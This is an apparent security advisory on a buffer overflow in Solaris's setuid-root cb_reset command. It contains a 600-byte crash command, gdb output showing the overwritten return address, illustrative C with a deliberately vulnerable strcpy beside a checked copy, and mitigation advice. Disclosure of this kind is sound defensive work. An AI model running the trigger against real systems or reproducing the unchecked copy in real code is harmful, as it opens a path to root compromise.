COMMAND

    /opt/SUNWssp/bin/cb_reset

SYSTEMS AFFECTED

    SunOS 5.8 (at least)

PROBLEM

    Pablo Sor found the following.  A problem with the cb_reset setuid
    root command included in the SUNWssp package (not part of the
    standard install) results in a buffer overflow and potentially the
    execution of arbitrary code.  Because the input parameter is not
    length-checked, an argument of 600 characters overflows a stack
    buffer and overwrites variables on the stack, including the saved
    return address.  Vulnerable packages/systems: SunOS 5.8 (other
    versions have not been tested).

        $ uname -a
        SunOS laika 5.8 Generic_108528-07 sun4u sparc SUNW,Ultra-5_10
        
        $ ls /tftpboot/cb_port
        /tftpboot/cb_port
        
        $ /opt/SUNWssp/bin/cb_reset `perl -e 'print "A"x600'`
        Resetting host
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
        ether_hostton(SrcHost:laika): No such file or directory
        ether_hostton(DstHost:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAA): No such file or directory
        Bus Error (core dumped)
        
        $ gdb /opt/SUNWssp/bin/cb_reset --core=core
        Copyright 2000 Free Software Foundation, Inc.
        GDB is free software, covered by the GNU General Public License, and you are
        welcome to change it and/or distribute copies of it under certain conditions.
        Type "show copying" to see the conditions.
        There is absolutely no warranty for GDB.  Type "show warranty" for details.
        This GDB was configured as "sparc-sun-solaris2.8"...
        (no debugging symbols found)...
        Core was generated by `/opt/SUNWssp/bin/cb_reset
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
        Program terminated with signal 10, Bus Error.
        Reading symbols from /opt/SUNWssp/lib/libSspFileAccess.so...
        (no debugging symbols found)...done.
        Loaded symbols for /opt/SUNWssp/lib/libSspFileAccess.so
        Reading symbols from /opt/SUNWssp/lib/liblogger.so...
        (no debugging symbols found)...done.
        
        [...]
        
        Loaded symbols for /usr/lib/nss_files.so.1
        #0  0x1219c in cb_send_frame ()
        (gdb) info registers
        g0             0x0      0
        g1             0xff195b80       -15115392
        g2             0xff322630       -13490640
        g3             0xff332d78       -13423240
        g4             0x0      0
        g5             0x0      0
        g6             0x0      0
        g7             0x0      0
        o0             0x13278  78456
        o1             0xff1bbab8       -14959944
        o2             0xff1b8018       -14974952
        o3             0x13278  78456
        o4             0x13258  78424
        o5             0xffbedb71       -4269199
        sp             0xffbedb18       -4269288
        o7             0x1218c  74124
        l0             0xc3c3c3c3       -1010580541
        l1             0x41414141       1094795585
        l2             0x41414141       1094795585
        l3             0x41414141       1094795585
        l4             0x41414141       1094795585
        l5             0x41414141       1094795585
        l6             0x41414141       1094795585
        l7             0x41414141       1094795585
        i0             0x41414141       1094795585
        i1             0x41414141       1094795585
        i2             0x41414141       1094795585
        i3             0x41414141       1094795585
        i4             0x4141414d       1094795597
        i5             0x41414141       1094795585
        fp             0x41414141       1094795585
        i7             0x41414141       1094795585  (***)
        y              0xb      11
        psr            0xfe801001       -25161727
        wim            0x0      0
        tbr            0x0      0
        pc             0x1219c  74140
        npc            0x121a0  74144
        fpsr           0x0      0
        cpsr           0x0      0
        (gdb)
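    The register dump above is the whole story in one screen: every
    local and input register of the crashing window, the frame pointer
    and the saved return address %i7 now hold 0x41414141, the bytes of
    the argument.  The following C is an added illustration of that bug
    class and is not cb_reset's source (which is not public): the
    buffer size, the function names and the hostname framing are
    assumptions.  It puts the unbounded copy beside a bounded one that
    rejects over-long input instead of truncating it, and builds the
    same 600-byte filler the advisory passes on the command line.

```c
/* Added example, not cb_reset's code: a minimal model of a setuid program
 * copying argv[1] into a fixed-size stack buffer, beside a checked version.
 * HOST_MAX and the function names are assumptions for illustration. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HOST_MAX 64   /* assumed buffer size; cb_reset's real size is unknown */

/* Vulnerable pattern: unbounded strcpy() of a caller-controlled string.
 * A long argument runs past the buffer into the register window save
 * area of the frame above it, which on SPARC holds the saved %fp (%i6)
 * and return address (%i7); that is exactly what the gdb dump shows.
 * Note the control usually materialises one level up: the overwritten
 * values are loaded back into the window when that frame returns.
 * Deliberately never called with untrusted input here. */
void reset_host_vulnerable(const char *arg)
{
    char host[HOST_MAX];
    strcpy(host, arg);          /* no length check */
    printf("Resetting host %s\n", host);
}

/* Hardened pattern: refuse an argument that does not fit, rather than
 * silently truncating it, so an over-long hostname never reaches the
 * stack frame at all.  Returns 0 on success, -1 if src is too long.
 * memchr() is used instead of strnlen() so the block stays strict C. */
int copy_hostname(char *dst, size_t dstsz, const char *src)
{
    const char *end = memchr(src, '\0', dstsz);  /* scans at most dstsz bytes */
    if (end == NULL)
        return -1;               /* no terminator within dstsz: too long */
    memcpy(dst, src, (size_t)(end - src) + 1);   /* includes the NUL */
    return 0;
}

/* Checked counterpart of reset_host_vulnerable(): 0 on success, 1 if the
 * argument was rejected. */
int reset_host_checked(const char *arg)
{
    char host[HOST_MAX];
    if (copy_hostname(host, sizeof host, arg) != 0) {
        fprintf(stderr, "hostname too long (max %d)\n", HOST_MAX - 1);
        return 1;
    }
    printf("Resetting host %s\n", host);
    return 0;
}

/* Builds the advisory's test input in-process: n bytes of 'A', the C
 * equivalent of perl -e 'print "A"x600'.  Caller frees the result. */
char *make_filler(size_t n)
{
    char *p = malloc(n + 1);
    if (p == NULL)
        return NULL;
    memset(p, 'A', n);
    p[n] = '\0';
    return p;
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s hostname\n", argv[0]);
        return 2;
    }
    /* Only the checked path ever sees argv. */
    return reset_host_checked(argv[1]);
}
```

    Running the binary with the 600-byte argument now prints the
    length error and exits instead of dumping core.  Until Sun's patch
    is available, the usual interim measure for a setuid binary like
    this is to remove its setuid bit (chmod u-s) on hosts that do not
    need non-root users to reset the host; the overflow then runs with
    the caller's own privileges and gains nothing.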

SOLUTION

    Sun Microsystems was notified on June 12, 2001.  Patches are
    expected shortly.